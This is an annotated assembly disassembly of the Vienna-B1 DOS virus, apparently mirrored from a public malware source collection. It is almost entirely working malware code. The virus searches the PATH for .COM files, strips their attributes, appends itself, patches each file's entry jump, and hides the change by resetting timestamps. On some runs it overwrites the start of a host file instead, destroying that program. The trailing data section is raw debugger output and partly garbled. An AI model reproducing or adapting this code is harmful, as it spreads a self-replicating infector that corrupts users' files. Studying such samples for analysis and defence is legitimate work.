mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
332 lines
14 KiB
NASM
332 lines
14 KiB
NASM
; disassembly of vienna-b1 virus
|
||
|
||
|
||
jmp label1
|
||
message:
|
||
db "ello, world!$" ;*************
|
||
mov ah,09h ;print string ; part of *
|
||
mov dx,message ;point to string ; original *
|
||
int 21h ;call msdos ; com file. *
|
||
int 20h ;terminate program ;*************
|
||
label1:
|
||
push cx ;
|
||
mov dx,0312h ;start of variables
|
||
cld ;clear direction
|
||
mov si,dx ;si = start of variables
|
||
add si,000Ah
|
||
mov di,0100h ;destination = 0100h
|
||
mov cx,0003 ;three bytes to move
|
||
repz movsb
|
||
mov si,dx ;si = 0312h (start of variables)
|
||
mov ah,30h ;get dos version number
|
||
int 21h ;call msdos
|
||
cmp al,00h ;old version?
|
||
jnz label2 ;no
|
||
jmp label3 ;yes
|
||
label2:
|
||
push es ;store extra segment
|
||
mov ah,2fh ;get DTA address
|
||
int 21h ;call msdos
|
||
mov [si+0000h],bx ;save DTA offset
|
||
mov [si+0002],es ;save DTA segment
|
||
pop es ;restore extra segment address
|
||
mov dx,005fh ;
|
||
nop
|
||
add dx,si ;pointer to new DTA address
|
||
mov ah,1ah ;set DTA address
|
||
int 21h ;call msdos
|
||
push es ;save extra segment address again
|
||
push si ;save source index register
|
||
mov es,[002ch]
|
||
mov di,0000h
|
||
label4:
|
||
pop si
|
||
push si
|
||
add si,001ah
|
||
lodsb ;get byte from source address
|
||
mov cx,8000h ;
|
||
repnz scasb
|
||
mov cx,0004h ;
|
||
label7:
|
||
lodsb ;get byte from source
|
||
scasb ;store byte
|
||
jnz label4 ;jump back till done
|
||
loop label7
|
||
pop si ;restore source index register
|
||
pop es ;and extra segment
|
||
mov [si+0016h],di
|
||
mov di,si
|
||
add di,001fh
|
||
mov bx,si
|
||
add si,001fh
|
||
mov di,si
|
||
jmp label5
|
||
label13:
|
||
cmp word ptr [si+0016h],00h
|
||
jnz label5
|
||
jmp label6
|
||
push ds
|
||
push si
|
||
es mov ds,[002ch]
|
||
mov di,si
|
||
es mov si,[di+0016h]
|
||
add di,001fh
|
||
label10:
|
||
lodsb ;get byte
|
||
cmp al,3bh
|
||
jz label8
|
||
cmp al,00h
|
||
jz label9
|
||
stosb ;store byte
|
||
jmp label10
|
||
label9:
|
||
mov si,0000h
|
||
label8:
|
||
pop bx
|
||
pop ds
|
||
mov [bx+0016h],si
|
||
cmp byte ptr [di-01h],5ch
|
||
jz label5
|
||
mov al,5ch
|
||
stosb ;store byte
|
||
label5:
|
||
mov [bx+0018h],di
|
||
mov si,bx
|
||
add si,0010h
|
||
mov cx,0006h
|
||
repz movsb
|
||
mov si,bx
|
||
mov ah,4eh ;search for first match
|
||
mov dx,001fh ;pointer to asciiz file spec.-si
|
||
nop
|
||
add dx,si ;pointer to asciiz file spec.
|
||
mov cx,0003h ;attribute to us in search match
|
||
int 21h ;call msdos
|
||
jmp label11
|
||
label14:
|
||
mov ah,4fh ;search for next match
|
||
int 21h ;call msdos
|
||
label11:
|
||
jnb label12
|
||
jmp label13
|
||
label12:
|
||
mov ax,[si+0075h]
|
||
and al,1fh
|
||
cmp al,1fh
|
||
jz label14
|
||
cmp word ptr [si+0079h],0fa00h
|
||
ja label14
|
||
cmp word ptr [si+0079h],0ah
|
||
jb label14
|
||
mov di,[si+0018h]
|
||
push si
|
||
add si,007dh
|
||
label15:
|
||
lodsb
|
||
stosb
|
||
cmp al,00h
|
||
jnz label15
|
||
pop si
|
||
mov ax,4300h ;get file attributes
|
||
mov dx,001fh ;pointer to asciiz file spec. -si
|
||
nop
|
||
add dx,si ;pointer to file spec.
|
||
int 21h ;call msdos
|
||
mov [si+0008h],cx
|
||
mov ax,4301 ;set file attributes
|
||
and cx,0fffeh ;new attributes
|
||
mov dx,001fh ;pointer to asciiz file spec. -si
|
||
nop
|
||
add dx,si ;pointer to asciiz file spec.
|
||
int 21h ;call msdos
|
||
mov ax,3d02h ;open file (handle)
|
||
mov dx,001fh ;pointer to asciiz file spec. -si
|
||
nop
|
||
add dx,si ;pointer to asciiz file spec.
|
||
int 21h ;call msdos
|
||
jnb label16
|
||
jmp label17
|
||
label16:
|
||
mov bx,ax
|
||
mov ax,5700h ;get time and date
|
||
int 21h ;call msdos
|
||
mov [si+0004],cx ;store time
|
||
mov [si+0006],dx ;store date
|
||
mov ah,2ch ;get system time
|
||
int 21h ;call msdos
|
||
and dh,07h
|
||
jnz label18
|
||
mov ah,40h ;write to file or device (handle)
|
||
mov cx,0005h ;number of bytes to write
|
||
mov dx,si ;get file spec. address -8ah
|
||
add dx,008ah ;add 8ah to get file spec. address
|
||
int 21h ;call msdos
|
||
jmp label19
|
||
nop
|
||
label18:
|
||
mov ah,3fh ;read file or device (handle)
|
||
mov cx,0003h ;number of bytes to read
|
||
mov dx,000ah ;point to buffer -si
|
||
nop
|
||
add dx,si ;pointer to buffer area
|
||
int 21h ;call msdos
|
||
jb label19
|
||
cmp ax,0003h ;number of bytes read
|
||
jnz label19
|
||
mov ax,4202h ;move file pointer
|
||
;offset from end of file
|
||
mov cx,0000h ;offset desired
|
||
mov dx,0000h ;as above
|
||
int 21h ;call msdos
|
||
jb label19
|
||
mov cx,ax
|
||
sub ax,0003h
|
||
mov [si+000eh],ax
|
||
add cx,02f9h
|
||
mov di,si
|
||
sub di,01f7h
|
||
mov [di],cx
|
||
mov ah,40h ;write to file or device (handle)
|
||
mov cx,0288h ;number of bytes to write
|
||
mov dx,si ;
|
||
sub dx,01f9h ;dx = pointer to buffer of data write
|
||
int 21h ;call msdos
|
||
jb label19
|
||
cmp ax,0288h ;288h bytes written?
|
||
jnz label19
|
||
mov ax,4200h ;move file pointer
|
||
;offset from beginning of file
|
||
mov cx,0000h ;desired offset
|
||
mov dx,0000h ;desired offset
|
||
int 21h ;call msdos
|
||
jb label19
|
||
mov ah,40h ;write to file or device (handle)
|
||
mov cx,0003h ;number of bytes to write
|
||
mov dx,si ;
|
||
add dx,000dh ;pointer to buffer of data write
|
||
int 21h ;call msdos
|
||
label19:
|
||
mov dx,[si+0006h]
|
||
mov cx,[si+0004h]
|
||
and cx,0ffe0h
|
||
or cx,001fh
|
||
mov ax,5701h ;set date and time
|
||
int 21h ;call msdos
|
||
mov ah,3eh ;close file
|
||
int 21h ;call msdos
|
||
label17:
|
||
mov ax,4301h ;set file attributes
|
||
mov di,[si+0008h]
|
||
mov dx,001fh ;pointer to asciiz file spec. -si
|
||
nop
|
||
add dx,si ;pointer to ascii file spec.
|
||
int 21h ;call msdos
|
||
label6:
|
||
push ds ;save data segment
|
||
mov ah,1ah ;set DTA address
|
||
mov dx,[si+0000] ;retrieve original DTA
|
||
mov ds,[si+0002] ;and data segment of dta
|
||
int 21h ;call msdos
|
||
pop ds ;restore DTA
|
||
label3:
|
||
pop cx
|
||
xor ax,ax ;clear accumulator
|
||
xor bx,bx ;and bx
|
||
xor dx,dx ;and dx
|
||
xor si,si ;and si
|
||
mov di,0100h ;pointer to execution program to be
|
||
;run now virus has finished
|
||
push di
|
||
xor di,di ;clear di
|
||
ret 0ffffh ;?
|
||
|
||
|
||
|
||
start_of_variables:
|
||
0312 80003E ADD BYTE PTR [BX+SI],3E
|
||
0315 40 inc ax
|
||
0316 D592 AAD 92
|
||
0318 8511 TEST dx,[BX+DI]
|
||
031A 2000 AND [BX+SI],AL
|
||
|
||
031C EB0E JMP 032ch ;jump address to place at
|
||
;beginning of source program
|
||
031E 48 DEC ax
|
||
031F E91600 JMP 0338
|
||
db "*.COM"
|
||
0327 0027 ADD [BX],ah
|
||
0329 0022 ADD [BP+SI],ah
|
||
032B 03
|
||
db "PATH=DANGER!.COM EM.COM"
|
||
032C 5041 ADD dx,[BX+SI+41]
|
||
032E 54 push SP
|
||
032F 48 DEC ax
|
||
0330 3D4441 cmp ax,4144
|
||
0333 4E DEC SI
|
||
0334 47 inc DI
|
||
0335 45 inc BP
|
||
0336 52 push dx
|
||
0337 212E434F AND [4F43],BP
|
||
033B 4D DEC BP
|
||
033C 00454D ADD [DI+4D],AL
|
||
033F 2E CS:
|
||
0340 43 inc BX
|
||
0341 4F DEC DI
|
||
0342 4D DEC BP
|
||
0343 0000 ADD [BX+SI],AL
|
||
0345 43 inc BX
|
||
0346 4F DEC DI
|
||
0347 4D DEC BP
|
||
0348 0020 ADD [BX+SI],ah
|
||
034A 2020 AND [BX+SI],ah
|
||
034C 2020 AND [BX+SI],ah
|
||
034E 2020 AND [BX+SI],ah
|
||
0350 2020 AND [BX+SI],ah
|
||
0352 2020 AND [BX+SI],ah
|
||
0354 2020 AND [BX+SI],ah
|
||
0356 2020 AND [BX+SI],ah
|
||
0358 2020 AND [BX+SI],ah
|
||
035A 2020 AND [BX+SI],ah
|
||
035C 2020 AND [BX+SI],ah
|
||
035E 2020 AND [BX+SI],ah
|
||
0360 2020 AND [BX+SI],ah
|
||
0362 2020 AND [BX+SI],ah
|
||
1463:0364 2020 AND [BX+SI],ah
|
||
1463:0366 2020 AND [BX+SI],ah
|
||
1463:0368 2020 AND [BX+SI],ah
|
||
1463:036A 2020 AND [BX+SI],ah
|
||
1463:036C 2020 AND [BX+SI],ah
|
||
1463:036E 2020 AND [BX+SI],ah
|
||
1463:0370 2003 AND [BP+DI],AL
|
||
1463:0372 3F AAS
|
||
1463:0373 3F AAS
|
||
1463:0374 3F AAS
|
||
1463:0375 3F AAS
|
||
1463:0376 3F AAS
|
||
1463:0377 3F AAS
|
||
1463:0378 3F AAS
|
||
1463:0379 3F AAS
|
||
1463:037A 43 inc BX
|
||
1463:037B 4F DEC DI
|
||
1463:037C 4D DEC BP
|
||
1463:037D 0305 ADD ax,[DI]
|
||
1463:037F 001F ADD [BX],BL
|
||
1463:0381 0020 ADD [BX+SI],ah
|
||
1463:0383 64 DB 64
|
||
1463:0384 7269 JB 03EF
|
||
1463:0386 20D5 AND CH,DL
|
||
1463:0388 92 XCHG dx,ax
|
||
1463:0389 8511 TEST dx,[BX+DI]
|
||
1463:038B 1900 SBB [BX+SI],ax
|
||
1463:038D 0000 ADD [BX+SI],AL
|
||
1463:038F 44 inc SP
|
||
1463:0390 41 inc cx
|
||
1463:0391 4E DEC SI
|
||
1463:0392 47 inc DI
|
||
1463:0393 45 inc BP
|
||
1463:0394 52 push dx
|
||
1463:0395 212E434F AND [4F43],BP
|
||
1463:0399 4D DEC BP
|
||
1463:039A 0000 ADD [BX+SI],AL
|
||
1463:039C EA0B021358 JMP 5813:020B
|
||
|